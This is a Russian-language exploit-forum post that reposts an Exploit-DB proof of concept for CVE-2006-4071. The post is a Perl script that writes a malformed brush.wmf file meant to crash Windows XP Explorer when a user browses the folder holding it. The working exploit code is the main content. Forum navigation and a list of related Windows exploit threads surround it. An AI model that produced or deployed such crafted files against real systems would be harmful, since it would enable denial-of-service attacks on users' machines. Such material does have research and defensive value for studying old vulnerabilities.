Exploit Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3111
Проверка EDB
  1. Пройдено
Автор
CYANID-E
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2006-4071
Дата публикации
2007-01-13
Код: 
#!/usr/bin/perl

print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmail.com>";
print "\n\ngenerating brush.wmf...";
open(WMF, ">./brush.wmf") or die "cannot create wmf file\n";
print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64";
print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print WMF "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print WMF "\x00\x00\x00\x00";
close(WMF);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

# milw0rm.com [2007-01-13]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
Ответы
0
Просмотры
791
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Ответы
0
Просмотры
653
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Ответы
0
Просмотры
638
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Explorer Out-of-Bound Read - Denial of Service (PoC)
Ответы
0
Просмотры
618
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4.0) - XML HTTP Redirect
Ответы
0
Просмотры
545
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
Ответы
0
Просмотры
476
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow
Ответы
0
Просмотры
450
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows 95/98 Internet Explorer 5/Telnet - Local Heap Overflow
Ответы
0
Просмотры
460
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows Explorer - 'explorer.exe .WMV' File Handling Denial of Service
Ответы
0
Просмотры
421
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft Windows XP/2000/2003 - Explorer Drag and Drop Remote Code Execution
Ответы
0
Просмотры
390
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу